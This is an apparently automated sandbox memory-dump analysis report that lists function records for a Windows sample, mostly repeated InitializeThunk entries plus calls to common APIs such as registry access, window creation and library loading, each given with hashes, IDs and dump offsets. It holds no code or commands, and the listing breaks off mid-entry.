                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: 1990597c85fcd09de38d29479f31f8748a3d4fa1bcdbb3041e427dabca1eaf6e
                                                            • Instruction ID: 4ea3658287cac67a9b15b9668c8cf70b3e1790fc2fc10ea558e4950b4d0f3e28
                                                            • Opcode Fuzzy Hash: 1990597c85fcd09de38d29479f31f8748a3d4fa1bcdbb3041e427dabca1eaf6e
                                                            • Instruction Fuzzy Hash: 2B421374A09228CFCB25DF74D89869DB7B6BF88305F2180EAD54EA3254CB349E81CF55
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.72339270389.0000000000E40000.00000040.00000001.sdmp, Offset: 00E40000, based on PE: false
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: 8823a2d5b6b4f9ecf4ad28f610925e35c204ab3ed4d974a97b4cdf06a5bde009
                                                            • Instruction ID: 18fdf0ddacdec8992f84bb0de4a07f1daf64b266991e279717ecf5c50f045cce
                                                            • Opcode Fuzzy Hash: 8823a2d5b6b4f9ecf4ad28f610925e35c204ab3ed4d974a97b4cdf06a5bde009
                                                            • Instruction Fuzzy Hash: 5E421374A09228CFCB25DF74D89869DB7B6BF88305F2180EAD54EA3254CB349E81CF55
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.72339270389.0000000000E40000.00000040.00000001.sdmp, Offset: 00E40000, based on PE: false
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: 4356f55ec556858b28e3b8fca5d777e3d8a4b16663a58857ba06e40d599a54f6
                                                            • Instruction ID: 1321fcf7a6461c84e91bacbb9be790e07830c7bd357a115426667a7f245c1110
                                                            • Opcode Fuzzy Hash: 4356f55ec556858b28e3b8fca5d777e3d8a4b16663a58857ba06e40d599a54f6
                                                            • Instruction Fuzzy Hash: A0422374A09228CFCB25DF74D89869DB7B6BF88305F2180EAD54EA3254CB349E81CF55
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.72339270389.0000000000E40000.00000040.00000001.sdmp, Offset: 00E40000, based on PE: false
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: 107792d45384fa1d2d81df0009bf16d4994541648a9d1f6f9fa53b00ef80de84
                                                            • Instruction ID: 6c0693d8e1733c06a3049f54b8fd7b22a64e6bc6689174e97d66552522f13c1c
                                                            • Opcode Fuzzy Hash: 107792d45384fa1d2d81df0009bf16d4994541648a9d1f6f9fa53b00ef80de84
                                                            • Instruction Fuzzy Hash: 62421474A09228CFCB25DF74D89869DB7B6BF88305F2180EAD54EA3254CB349E81CF55
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.72339270389.0000000000E40000.00000040.00000001.sdmp, Offset: 00E40000, based on PE: false
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: 445785203e8454d6750d1e13543fb167d7c0c5610f8630603fc424b31f352dbb
                                                            • Instruction ID: 14239cd4367e4bba0590484dbc8f0c723eb815a988e69efe6a25801f75738e4b
                                                            • Opcode Fuzzy Hash: 445785203e8454d6750d1e13543fb167d7c0c5610f8630603fc424b31f352dbb
                                                            • Instruction Fuzzy Hash: 4A421474A09228CFCB25DF74D89869DB7B6BF88305F2180EAD50EA3254CB349E81CF55
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.72339270389.0000000000E40000.00000040.00000001.sdmp, Offset: 00E40000, based on PE: false
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: 7a04df89ee2854cfba1702072fd2ee159894197176ad513165b2f8e2f4e5b0bb
                                                            • Instruction ID: 59b5156781b28f81d91633e2b2b165f88099f5c076117df0bc6854f37c4180ab
                                                            • Opcode Fuzzy Hash: 7a04df89ee2854cfba1702072fd2ee159894197176ad513165b2f8e2f4e5b0bb
                                                            • Instruction Fuzzy Hash: D3421474A09228CFCB25DF74D89869DB7B6BF88305F2180EAD50EA3254CB349E81CF55
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.72339270389.0000000000E40000.00000040.00000001.sdmp, Offset: 00E40000, based on PE: false
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: f4773170f8738e131cf67e5df400e5abec6781cca46e09751517353a0002a3cd
                                                            • Instruction ID: 2611fbcbcec2db7ef8fb9dfbf0446b3a3f4934980429280a1c01a4aa9af8b909
                                                            • Opcode Fuzzy Hash: f4773170f8738e131cf67e5df400e5abec6781cca46e09751517353a0002a3cd
                                                            • Instruction Fuzzy Hash: D5321574A09228CFCB65DF74D89869DB7B6BF88305F2180EAD50EA3254CB349E81CF55
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.72339270389.0000000000E40000.00000040.00000001.sdmp, Offset: 00E40000, based on PE: false
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: 1482a8dc5b7672d84c04a77657e35a9c69f4eb1090d929872fbd4f3ac207b47d
                                                            • Instruction ID: 6bbd973a21aeb13eacdc8785d0f05eb47ee45f5a2bfa39027a485205a569bd82
                                                            • Opcode Fuzzy Hash: 1482a8dc5b7672d84c04a77657e35a9c69f4eb1090d929872fbd4f3ac207b47d
                                                            • Instruction Fuzzy Hash: DB321574A09228CFCB65DF74D89869DB7B6BF88305F2180EAD50EA3254CB349E81CF55
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.72339270389.0000000000E40000.00000040.00000001.sdmp, Offset: 00E40000, based on PE: false
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: 07daae2bbf96c091bd89926e5481c71cc8463f02a2c56a20c8fe8502929d4076
                                                            • Instruction ID: 12e2214fed9831590b6c430b3a4d1707d8679c4a204d271f140ec54dc1b842f9
                                                            • Opcode Fuzzy Hash: 07daae2bbf96c091bd89926e5481c71cc8463f02a2c56a20c8fe8502929d4076
                                                            • Instruction Fuzzy Hash: 13321574A09228CFCB24DF74D89869DB7B6BF88305F2180EAD50EA3254DB349E81CF55
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.72339270389.0000000000E40000.00000040.00000001.sdmp, Offset: 00E40000, based on PE: false
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: bec2e7be919bee992db7bb1ff0fcda21d7f51986ad8fe17145a604f3331d0eae
                                                            • Instruction ID: b00f9a6766c132ede418fab5a22a20d6aa9cadeea9756e0b00aefe5ea7b41a31
                                                            • Opcode Fuzzy Hash: bec2e7be919bee992db7bb1ff0fcda21d7f51986ad8fe17145a604f3331d0eae
                                                            • Instruction Fuzzy Hash: 40321674A09228CFCB249F74D89879DB7B6BF88305F2180EAD50EA3254DB349E81CF55
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.72339270389.0000000000E40000.00000040.00000001.sdmp, Offset: 00E40000, based on PE: false
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: d2f8ba7d3f84ddb032659218c234dab4e55c2318b4b256066ab8548465a32ed8
                                                            • Instruction ID: 4093d1c7ee237ac38263458e49e94f19693acadf22dff9770748605b3c3a4b27
                                                            • Opcode Fuzzy Hash: d2f8ba7d3f84ddb032659218c234dab4e55c2318b4b256066ab8548465a32ed8
                                                            • Instruction Fuzzy Hash: 5B321674A09228CFCB649F74D89879DB7B6BF88305F2180EAD54EA3250DB349E81CF55
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.72339270389.0000000000E40000.00000040.00000001.sdmp, Offset: 00E40000, based on PE: false
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: 7beab5eb9d08c055f5d93fdbdf98e4a5cf4427f9a695f69c20d7f16ab2ff1a9b
                                                            • Instruction ID: c3097bf53bd5f8f1119503bb7c21b0d75aa5a0fa4c442df50869877d67a38237
                                                            • Opcode Fuzzy Hash: 7beab5eb9d08c055f5d93fdbdf98e4a5cf4427f9a695f69c20d7f16ab2ff1a9b
                                                            • Instruction Fuzzy Hash: 2A321774A09228CFCB649F74D89879DB7B6BF88305F2180EAD54EA3250DB349E81CF55
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.72339270389.0000000000E40000.00000040.00000001.sdmp, Offset: 00E40000, based on PE: false
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: 0a2814b678601c09988593a43f617a250f6e956d4859403817afaad717b6185f
                                                            • Instruction ID: 833f3705d0747f6f96400f7abcb1db86414c44869d0366c6ba9684a39335834a
                                                            • Opcode Fuzzy Hash: 0a2814b678601c09988593a43f617a250f6e956d4859403817afaad717b6185f
                                                            • Instruction Fuzzy Hash: DE221774A09228CFCB249F74D89879DB7B6BF88305F2180EAD50EA3250DB349E81CF55
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.72339270389.0000000000E40000.00000040.00000001.sdmp, Offset: 00E40000, based on PE: false
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: e43118f7f2dd350434e88fbe7d3dd223430991cc9cf46e7786741165fc3da655
                                                            • Instruction ID: ac9b889e6684324a5bea20cae82a32a13d29809a9d23a94ded299fdf8e5be1e6
                                                            • Opcode Fuzzy Hash: e43118f7f2dd350434e88fbe7d3dd223430991cc9cf46e7786741165fc3da655
                                                            • Instruction Fuzzy Hash: AA221874A09228CFCB649F74D89879DB7B6BF88305F2180EAD54EA3250DB349E81CF55
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.72339270389.0000000000E40000.00000040.00000001.sdmp, Offset: 00E40000, based on PE: false
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: 5d561ff7261716a68ed54c9c80098028983ac1e09a68da985016e91a4a65d4fd
                                                            • Instruction ID: 9eb5c13f7398ba5d61a280c7cffaa18eb51177663e48d16f4376a18efc2f4840
                                                            • Opcode Fuzzy Hash: 5d561ff7261716a68ed54c9c80098028983ac1e09a68da985016e91a4a65d4fd
                                                            • Instruction Fuzzy Hash: 52220974A09228CFCB649F74C89879DB7B6AF88305F2180EAD54EA3254DB349E81CF55
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.72339270389.0000000000E40000.00000040.00000001.sdmp, Offset: 00E40000, based on PE: false
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: ea461d888254f36ddaa7e85ba1de0a54d8fc8807b9740adff210c12adf621b0a
                                                            • Instruction ID: 08341b80d9918e161dfa81b4c7c664df29aee8b1d7cc366d27b2747378e92e2b
                                                            • Opcode Fuzzy Hash: ea461d888254f36ddaa7e85ba1de0a54d8fc8807b9740adff210c12adf621b0a
                                                            • Instruction Fuzzy Hash: 74220974A09228CFCB649F74C89879DB7B6BF88305F2180EAD54EA3254DB349E81CF55
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.72339270389.0000000000E40000.00000040.00000001.sdmp, Offset: 00E40000, based on PE: false
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: 432d01eecc41a0560f64345bacdd9ddcf0a4705de1be302a8518e4f44acce517
                                                            • Instruction ID: 8edfb094a15841b676f3abb91551617ae22268b0065cb9248446d25ced9c5976
                                                            • Opcode Fuzzy Hash: 432d01eecc41a0560f64345bacdd9ddcf0a4705de1be302a8518e4f44acce517
                                                            • Instruction Fuzzy Hash: CC221A74A09228CFCB649F74C89879DB7B6BF88305F2180EAD54EA3254DB349E81CF55
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.72339270389.0000000000E40000.00000040.00000001.sdmp, Offset: 00E40000, based on PE: false
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: 99e13273d78eb90aa04254831a7c966bdff2c8857b898d059dbcdf1cd19f431f
                                                            • Instruction ID: aaf6e19b32263de257afe4047e74b0b66152f43d6ad93c60ded842a0531e2a8a
                                                            • Opcode Fuzzy Hash: 99e13273d78eb90aa04254831a7c966bdff2c8857b898d059dbcdf1cd19f431f
                                                            • Instruction Fuzzy Hash: C8121B74A09228CFCB549F74C89879DB7B6BF88305F2180EAD50EA3254DB349D85CF55
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.72339270389.0000000000E40000.00000040.00000001.sdmp, Offset: 00E40000, based on PE: false
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: 71b499a60959917e30fdd1921a2d50046c0dab1277d4c9afe52084be9304655e
                                                            • Instruction ID: 706f531b30f0f522ad813e34dcb92583ce83bf7c6fac28736971603e4dd7d86a
                                                            • Opcode Fuzzy Hash: 71b499a60959917e30fdd1921a2d50046c0dab1277d4c9afe52084be9304655e
                                                            • Instruction Fuzzy Hash: 23121B74A09228CFCB64DF74C89879DB7B6AF88305F2180EAD50EA3254DB349D85CF55
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.72339270389.0000000000E40000.00000040.00000001.sdmp, Offset: 00E40000, based on PE: false
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: e8e34b3d18350c2d21adab58239d0c757e1d688a1d0a054cad9e60621e83078b
                                                            • Instruction ID: bc277c55749fcad95f818811defd1a103b315116c424fc41a1145e6caf9aca58
                                                            • Opcode Fuzzy Hash: e8e34b3d18350c2d21adab58239d0c757e1d688a1d0a054cad9e60621e83078b
                                                            • Instruction Fuzzy Hash: 0C121A74A09228CFCB649F74C89879DB7B6AF88305F2180EAD50EA3254DB349D85CF95
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.72339270389.0000000000E40000.00000040.00000001.sdmp, Offset: 00E40000, based on PE: false
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: fff1b89b6cd87e2a912fc3b7a50b27276c8430b3ce212a55033b2305e991d638
                                                            • Instruction ID: 9d5bda8f9bb014f56f374152cb45081ef7c5e7af288d534b3c6e6285b130938f
                                                            • Opcode Fuzzy Hash: fff1b89b6cd87e2a912fc3b7a50b27276c8430b3ce212a55033b2305e991d638
                                                            • Instruction Fuzzy Hash: 64121A74A09228CFCB649F74C89879DB7B6BF88305F2180EAD50EA3254DB349D85CF95
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.72348699773.000000001CDB0000.00000040.00000001.sdmp, Offset: 1CDB0000, based on PE: false
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: 9dadd4137b261105f7ba212e5bc89ef1944f62388506d8bc974617b7522b1ad2
                                                            • Instruction ID: 0961de6a34baf7859f86916cf4f25fc54c13b570822b05be7aebf86e941968ee
                                                            • Opcode Fuzzy Hash: 9dadd4137b261105f7ba212e5bc89ef1944f62388506d8bc974617b7522b1ad2
                                                            • Instruction Fuzzy Hash: 91B11534A093458FD7019BB4CC55B9E7BF2AF86304F1188A9E506EB2A2DF39DC45CB61
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • RegQueryValueExW.KERNEL32(00000000,00000000,?,?,00000000,?), ref: 0121CFF9
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.72340367101.0000000001210000.00000040.00000001.sdmp, Offset: 01210000, based on PE: false
                                                            Similarity
                                                            • API ID: QueryValue
                                                            • String ID:
                                                            • API String ID: 3660427363-0
                                                            • Opcode ID: b142e191a78b6bd8d2eb40cbdeaf678fa59c07a98ab14c87e2f1400502061812
                                                            • Instruction ID: 5976d55e72a09b66b8c8715565b889d40ff8c5367752dc58974ece16e441dcc9
                                                            • Opcode Fuzzy Hash: b142e191a78b6bd8d2eb40cbdeaf678fa59c07a98ab14c87e2f1400502061812
                                                            • Instruction Fuzzy Hash: 0C4167B4E082999FCB11CFA9C884ACEBFF5AF49340F15806AE908EB355D7749805CB91
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 1DE6690A
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.72350690092.000000001DE60000.00000040.00000001.sdmp, Offset: 1DE60000, based on PE: false
                                                            Similarity
                                                            • API ID: CreateWindow
                                                            • String ID:
                                                            • API String ID: 716092398-0
                                                            • Opcode ID: 9f344d1ba95b8380d2723e6d9ae8970c7786b2dd812af833a15a52e7b04c5e41
                                                            • Instruction ID: 36606e33a8981de13e6a83da26e35f6e640e04292d7d71f80e0fddc0bb8de061
                                                            • Opcode Fuzzy Hash: 9f344d1ba95b8380d2723e6d9ae8970c7786b2dd812af833a15a52e7b04c5e41
                                                            • Instruction Fuzzy Hash: 0551D0B1D102499FDF14CFA9C884ADEBBB5FF48314F20852EE819AB210D774A945CF91
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 1DE6690A
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.72350690092.000000001DE60000.00000040.00000001.sdmp, Offset: 1DE60000, based on PE: false
                                                            Similarity
                                                            • API ID: CreateWindow
                                                            • String ID:
                                                            • API String ID: 716092398-0
                                                            • Opcode ID: 0e4631a7e48fb3615507ae0f76dbaff4e0b9c02b2228584f36798b58dcc5c16d
                                                            • Instruction ID: 7da84d729af91d109fe7cb1cc3f422271509b80ff23873856e9730b7e725011c
                                                            • Opcode Fuzzy Hash: 0e4631a7e48fb3615507ae0f76dbaff4e0b9c02b2228584f36798b58dcc5c16d
                                                            • Instruction Fuzzy Hash: E551C0B1D10249DFDF14CFAAC884ADEBBB5BF48314F20812EE819AB214D770A945CF91
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • CallWindowProcW.USER32(?,?,?,?,?), ref: 1DE6B4E1
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.72350690092.000000001DE60000.00000040.00000001.sdmp, Offset: 1DE60000, based on PE: false
                                                            Similarity
                                                            • API ID: CallProcWindow
                                                            • String ID:
                                                            • API String ID: 2714655100-0
                                                            • Opcode ID: 3bd9a310a4a396724ee375aec9708a991415241b5d4ea0b08af7da23baf05a47
                                                            • Instruction ID: 01db21e20b56bcaf953280e0645775c730134236ee0371036a091d631a49c24b
                                                            • Opcode Fuzzy Hash: 3bd9a310a4a396724ee375aec9708a991415241b5d4ea0b08af7da23baf05a47
                                                            • Instruction Fuzzy Hash: F14158B8A403598FCB14CF95C488AAABBF5FF88315F24C459D519AB321DB34A841CBA1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • RegQueryValueExW.KERNEL32(00000000,00000000,?,?,00000000,?), ref: 0121CFF9
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.72340367101.0000000001210000.00000040.00000001.sdmp, Offset: 01210000, based on PE: false
                                                            Similarity
                                                            • API ID: QueryValue
                                                            • String ID:
                                                            • API String ID: 3660427363-0
                                                            • Opcode ID: 87efb34103c91ac18592527df5fa9fd96e1cc0565b34e088b62a8b817d01f004
                                                            • Instruction ID: b61eecc60dfafc47e5378146a8ee76d3b8983df8172112b813908a35e01af43a
                                                            • Opcode Fuzzy Hash: 87efb34103c91ac18592527df5fa9fd96e1cc0565b34e088b62a8b817d01f004
                                                            • Instruction Fuzzy Hash: 5B31CEB5D11258DFCB20CFDAC984A9EBFF5AF48350F14802AE918AB314D774A905CFA5
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • RegOpenKeyExW.KERNEL32(80000001,00000000,?,00000001,?), ref: 0121CD3C
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.72340367101.0000000001210000.00000040.00000001.sdmp, Offset: 01210000, based on PE: false
                                                            Similarity
                                                            • API ID: Open
                                                            • String ID:
                                                            • API String ID: 71445658-0
                                                            • Opcode ID: 3ae76afe9518f76ab80c1463d95c336f8b833ce37e0c51a6c4dce8e2330320f1
                                                            • Instruction ID: 77a9642c00d9e985c9411e8f1c0d9ac238b260dfda2e20e9d64e8856f62391c0
                                                            • Opcode Fuzzy Hash: 3ae76afe9518f76ab80c1463d95c336f8b833ce37e0c51a6c4dce8e2330320f1
                                                            • Instruction Fuzzy Hash: 543112B4D102898FDB10CFA9C588ACEFFF5AF48304F24856AE408AB355C7B59845CB91
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • RegOpenKeyExW.KERNEL32(80000001,00000000,?,00000001,?), ref: 0121CD3C
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.72340367101.0000000001210000.00000040.00000001.sdmp, Offset: 01210000, based on PE: false
                                                            Similarity
                                                            • API ID: Open
                                                            • String ID:
                                                            • API String ID: 71445658-0
                                                            • Opcode ID: 9bf480757ff59231e53779a970c6c4cc981295592547bc28d7c7b4e4e03989e5
                                                            • Instruction ID: 8ab3cf99b0996a4212b004692345fd09ed92b6834e4ce8c6d40906e04998537f
                                                            • Opcode Fuzzy Hash: 9bf480757ff59231e53779a970c6c4cc981295592547bc28d7c7b4e4e03989e5
                                                            • Instruction Fuzzy Hash: DB3111B4D112898FDB14CFA9C588ACEFFF5BF48304F24856AE908AB315C7B59845CB91
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,1DE6A516,?,?,?,?,?), ref: 1DE6A5D7
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.72350690092.000000001DE60000.00000040.00000001.sdmp, Offset: 1DE60000, based on PE: false
                                                            Similarity
                                                            • API ID: DuplicateHandle
                                                            • String ID:
                                                            • API String ID: 3793708945-0
                                                            • Opcode ID: df0731dc34e0d0f04e68663e7030549c6f1aa56f779e44ce5e963dfe357d8030
                                                            • Instruction ID: de3f81dd3ac78d56fa545800082b5b9527fff87feb338f277dce04f15779a686
                                                            • Opcode Fuzzy Hash: df0731dc34e0d0f04e68663e7030549c6f1aa56f779e44ce5e963dfe357d8030
                                                            • Instruction Fuzzy Hash: 312103B5D002489FDB10CFAAD984AEEBBF8FB48314F10841AE914B7311D778A950CFA5
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,1DE6A516,?,?,?,?,?), ref: 1DE6A5D7
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.72350690092.000000001DE60000.00000040.00000001.sdmp, Offset: 1DE60000, based on PE: false
                                                            Similarity
                                                            • API ID: DuplicateHandle
                                                            • String ID:
                                                            • API String ID: 3793708945-0
                                                            • Opcode ID: 5d576e07feb04b6973b749384e8bf3915fbb750bb69d0adfa7fa296c5a5960cb
                                                            • Instruction ID: ee5d39bd7fc42e37f32d5e393f8533de62ea62959fedc2066dedb72e88cf9be9
                                                            • Opcode Fuzzy Hash: 5d576e07feb04b6973b749384e8bf3915fbb750bb69d0adfa7fa296c5a5960cb
                                                            • Instruction Fuzzy Hash: 3C21E3B5D002589FDB10CFAAD584AEEBBF4FB48310F24841AE955A7311D374A945CF61
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • FindWindowW.USER32(00000000,00000000), ref: 1CDBFC16
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.72348699773.000000001CDB0000.00000040.00000001.sdmp, Offset: 1CDB0000, based on PE: false
                                                            Similarity
                                                            • API ID: FindWindow
                                                            • String ID:
                                                            • API String ID: 134000473-0
                                                            • Opcode ID: 71621e0e8d758a3666a63daf75fae8450a295b48b27d24de3fd587474f0a7322
                                                            • Instruction ID: c315293eda3d52415496053a73a41e68625e1a66490be91ccd4968ff0229fa25
                                                            • Opcode Fuzzy Hash: 71621e0e8d758a3666a63daf75fae8450a295b48b27d24de3fd587474f0a7322
                                                            • Instruction Fuzzy Hash: 482132B9C012498FCB14CF9AD884AEEFBB4FB89210F20856ED81AB7610C3756545CFA1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • TerminateThread.KERNEL32(-11FAD871), ref: 00F0C12A
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.72339683086.0000000000F0C000.00000040.00000001.sdmp, Offset: 00F0C000, based on PE: false
                                                            Similarity
                                                            • API ID: TerminateThread
                                                            • String ID:
                                                            • API String ID: 1852365436-0
                                                            • Opcode ID: 674023a2e2bc1e808946369d3ffbf1ca28839457f0229ae1d565b3400ac12af0
                                                            • Instruction ID: ed5b4badd95776ea121a185b51fad026a43d3094ce778626b1d734b99eb0c63d
                                                            • Opcode Fuzzy Hash: 674023a2e2bc1e808946369d3ffbf1ca28839457f0229ae1d565b3400ac12af0
                                                            • Instruction Fuzzy Hash: 1C1138319043519FCB348F28CDD57E677E2EF02710F4942A9DC895B2AAD7324945E782
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • LoadLibraryExW.KERNEL32(00000000,00000000,?,?,?,?,?,?,00000000,?,1CDA2791,00000800), ref: 1CDA2822
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.72348620510.000000001CDA0000.00000040.00000001.sdmp, Offset: 1CDA0000, based on PE: false
                                                            Similarity
                                                            • API ID: LibraryLoad
                                                            • String ID:
                                                            • API String ID: 1029625771-0
                                                            • Opcode ID: 790e81c7ed06deb7b81f514f12ed4f288f16afd3bda657b44d9b08b1d90a59cb
                                                            • Instruction ID: d0a03ca5faa9941e4c111dc95f60e7cbb385737aca4bda21e9f218726e09ac12
                                                            • Opcode Fuzzy Hash: 790e81c7ed06deb7b81f514f12ed4f288f16afd3bda657b44d9b08b1d90a59cb
                                                            • Instruction Fuzzy Hash: F61106B6D002588FDB14CFAAD444ADEFBF4EB88310F10841EE819A7610C375A945CFA1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • FindWindowW.USER32(00000000,00000000), ref: 1CDBFC16
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.72348699773.000000001CDB0000.00000040.00000001.sdmp, Offset: 1CDB0000, based on PE: false
                                                            Similarity
                                                            • API ID: FindWindow
                                                            • String ID:
                                                            • API String ID: 134000473-0
                                                            • Opcode ID: 8e03dc3e7eda51e728136d5c02d25e3057ea95faad1db3668e3c84f1ac1da3ec
                                                            • Instruction ID: 7687431163ca947525c0ae9e6cf50e3afee883fc00def0ea1c4e0a664fe8f318
                                                            • Opcode Fuzzy Hash: 8e03dc3e7eda51e728136d5c02d25e3057ea95faad1db3668e3c84f1ac1da3ec
                                                            • Instruction Fuzzy Hash: 4D1122B9C012098FCB00CF9AC484ADEFBB4FB49210F20856ED81AB7610C375A544CBA5
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • GetModuleHandleW.KERNEL32(00000000), ref: 1DE657B6
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.72350690092.000000001DE60000.00000040.00000001.sdmp, Offset: 1DE60000, based on PE: false
                                                            Similarity
                                                            • API ID: HandleModule
                                                            • String ID:
                                                            • API String ID: 4139908857-0
                                                            • Opcode ID: 7484dc73f23acb8dcb0bcdc12fb2e546350eaea7611dd138847a8f6d80a4617f
